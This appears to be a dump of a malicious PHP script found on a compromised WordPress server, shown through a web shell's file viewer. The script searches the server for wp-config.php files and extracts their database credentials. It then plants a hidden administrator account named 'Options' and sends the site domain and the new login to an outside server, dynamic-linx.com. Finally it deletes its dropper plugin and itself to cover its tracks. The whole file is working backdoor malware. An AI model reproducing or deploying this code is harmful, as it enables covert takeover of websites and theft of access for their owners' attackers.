Current Path : /homepages/42/d735459332/htdocs/eliminamostusdeudas/wp-admin/ |
Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
|
Current File : /homepages/42/d735459332/htdocs/eliminamostusdeudas/wp-admin/wp-control-final-dg.php |
<?php
function check_wp_config($directory) {
while ($directory !== '/') {
$wp_config_file = $directory . '/wp-config.php';
if (file_exists($wp_config_file)) {
return $wp_config_file;
}
$directory = dirname($directory);
}
return false;
}
function parse_wp_config($config_file) {
if (file_exists($config_file)) {
$config_content = file_get_contents($config_file);
$matches = [];
// Extract prefix
if (preg_match("/\$table_prefix\s*=\s*'(.+?)';/", $config_content, $matches)) {
$prefix = $matches[1];
} else if (preg_match("/table_prefix.*=.*'(.+?)';/", $config_content, $matches)) {
$prefix = $matches[1];
} else {
die("Prefix not found in wp-config.php");
}
// Extract database name
if (preg_match("/define\(\s*'DB_NAME'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$database = $matches[1];
}
// Extract username
if (preg_match("/define\(\s*'DB_USER'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$username = $matches[1];
}
// Extract password
if (preg_match("/define\(\s*'DB_PASSWORD'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$password = $matches[1];
}
// Extract host
if (preg_match("/define\(\s*'DB_HOST'\s*,\s*'(.+?)'\s*\);/", $config_content, $matches)) {
$host = $matches[1];
} else {
$host = 'localhost'; // Assuming local host if not specified
}
return array(
'prefix' => $prefix,
'database' => $database,
'username' => $username,
'password' => $password,
'host' => $host
);
} else {
die("wp-config.php file not found");
}
}
function access_database($config) {
$mysqli = new mysqli($config['host'], $config['username'], $config['password'], $config['database']);
if ($mysqli->connect_errno) {
echo "DATABASE ACCESS [FAIL]\n";
return false;
} else {
echo "DATABASE ACCESS [SUCCESS]\n";
return $mysqli;
}
}
function generate_random_password($length = 12) {
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()-_';
$password = '';
$characters_length = strlen($characters);
for ($i = 0; $i < $length; $i++) {
$password .= $characters[rand(0, $characters_length - 1)];
}
return $password;
}
// Define a global variable for the password
$generated_password = generate_random_password();
function add_admin_user($mysqli, $config) {
global $generated_password; // Access the global generated password variable
$username = 'Options';
$password = $generated_password;
$user_role = 'administrator';
// Hash the password
$hashed_password = password_hash($password, PASSWORD_DEFAULT);
// Check if the user already exists
$query = "SELECT ID FROM {$config['prefix']}users WHERE user_login = '{$username}'";
$result = $mysqli->query($query);
if ($result && $result->num_rows > 0) {
echo "User '{$username}' already exists.\n";
} else {
// Insert the new user
$query = "INSERT INTO {$config['prefix']}users (user_login, user_pass, user_nicename, user_email, user_registered) VALUES ('{$username}', '{$hashed_password}', '{$username}', '{$username}@example.com', NOW())";
$result = $mysqli->query($query);
if ($result) {
$user_id = $mysqli->insert_id;
// Set user role
$query = "INSERT INTO {$config['prefix']}usermeta (user_id, meta_key, meta_value) VALUES ({$user_id}, '{$config['prefix']}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')";
$result = $mysqli->query($query);
if ($result) {
echo "User '{$username}' with administrative privileges added successfully.\n";
} else {
echo "Error assigning role to user '{$username}'.\n";
}
} else {
echo "Error creating user '{$username}': " . $mysqli->error . "\n";
}
}
}
function get_domain_from_path($path) {
$parent_directory = dirname(dirname($path)); // Get the parent directory of the wp-config.php path
$parts = explode('/', $parent_directory);
$domain = end($parts); // Get the last segment of the path
if (filter_var($domain, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME)) {
return $domain;
}
return null;
}
function pachamama($path) {
if (strpos($path, '/wp-config.php') !== false) {
$path = str_replace('/wp-config.php', '', $path);
}
$current_directory = $path;
$wp_config_file = check_wp_config($current_directory);
if ($wp_config_file) {
echo "WP-CONFIG [FOUND]\n";
$config = parse_wp_config($wp_config_file);
$mysqli = access_database($config);
if ($mysqli) {
add_admin_user($mysqli, $config);
$mysqli->close();
}
$domain = get_domain_from_path($wp_config_file);
if ($domain) {
echo "[$domain] OK\n";
// Perform a POST request to https://dynamic-linx.com/AddSites
$url = 'https://dynamic-linx.com/AddSites';
$post_data = array(
'domain' => $domain,
'username' => 'Options',
'password' => $GLOBALS['generated_password'] // Access the global generated password variable
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data)); // Send JSON data
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json', // Set content type to JSON
'Content-Length: ' . strlen(json_encode($post_data)) // Set content length
));
$response = curl_exec($ch);
$error = curl_error($ch); // Get any curl error
curl_close($ch);
if ($response === false) {
echo "POST request failed: $error\n";
} else {
echo "POST request sent successfully. Response: $response\n";
}
}
} else {
echo "WP-CONFIG [NOT FOUND]\n";
}
}
function find_wp_configs(&$wp_config_paths, $depth = 0) {
$current_directory = getcwd();
$parent_directory = $current_directory;
// Go back three parents
for ($i = 0; $i < 3; $i++) {
$parent_directory = dirname($parent_directory);
}
// Start the search from the parent directory
find_wp_configs_recursive($parent_directory, $wp_config_paths);
}
function find_wp_configs_recursive($directory, &$wp_config_paths) {
// Check if wp-config.php exists in the current directory
$wp_config_file = $directory . '/wp-config.php';
if (file_exists($wp_config_file)) {
$wp_config_paths[] = $wp_config_file;
}
// Continue searching forward recursively
$contents = scandir($directory);
foreach ($contents as $item) {
if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) {
find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths);
}
}
}
function print_wp_config_paths() {
$wp_config_paths = [];
find_wp_configs($wp_config_paths);
if (empty($wp_config_paths)) {
echo "No wp-config.php files found.\n";
} else {
echo "List of wp-config.php files:\n";
foreach ($wp_config_paths as $wp_config_path) {
echo "$wp_config_path\n";
}
}
}
$wp_config_paths = [];
find_wp_configs($wp_config_paths);
foreach ($wp_config_paths as $wp_config_path) {
pachamama($wp_config_path);
}
function delete_init_and_self() {
// Get the current directory
$current_directory = getcwd();
// Move to the parent directory
$parent_directory = dirname($current_directory);
// Move to wp-content/plugins/init folder
$init_directory = $parent_directory . '/wp-content/plugins/init';
// Check if init.php exists in the init directory
$init_file = $init_directory . '/init.php';
if (file_exists($init_file)) {
// Delete init.php
unlink($init_file);
echo "init.php deleted successfully.\n";
} else {
echo "init.php not found.\n";
}
// Get the path of the currently running PHP script
$current_script = $_SERVER['SCRIPT_FILENAME'];
// Delete the currently running PHP script
if (file_exists($current_script)) {
// Delete the script
unlink($current_script);
echo "Current script deleted successfully.\n";
} else {
echo "Current script not found.\n";
}
}
// Call the function to perform deletion tasks
delete_init_and_self();
?>